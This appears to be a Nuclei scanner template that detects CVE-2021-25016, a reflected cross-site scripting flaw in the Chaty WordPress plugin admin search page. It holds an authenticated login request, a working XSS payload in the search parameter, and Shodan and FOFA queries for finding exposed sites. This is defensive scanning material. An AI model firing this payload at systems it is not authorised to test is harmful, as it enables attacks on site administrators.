id: CVE-2021-25016 info: name: Chaty < 2.8.2 - Cross-Site Scripting author: luisfelipe146 severity: medium description: | The Chaty WordPress plugin before 2.8.3 and Chaty Pro WordPress plugin before 2.8.2 do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting. remediation: Fixed in 2.8.3 reference: - https://wpscan.com/vulnerability/b5035987-6227-4fc6-bc45-1e8016e5c4c0 - https://nvd.nist.gov/vuln/detail/CVE-2021-25016 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25016 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-25016 cwe-id: CWE-79 epss-score: 0.00106 epss-percentile: 0.43227 cpe: cpe:2.3:a:premio:chaty:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: premio product: chaty framework: wordpress shodan-query: http.html:/wp-content/plugins/chaty/ fofa-query: body=/wp-content/plugins/chaty/ publicwww-query: "/wp-content/plugins/chaty/" tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,authenticated,chaty,premio http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - | GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - "search=" - "chaty_page_chaty" condition: and - type: word part: header words: - text/html - type: status status: - 200 # digest: 4a0a00473045022100c82f86dcd3e8b4a15e3ddea6f2679ac006399a334f94d29004e7c499a456647c02207d7a1d690acd371e2575c5a5890894ee0a0e3ca1c7507d8e83c613349a67ec41:922c64590222798bb761d5b6d8e72950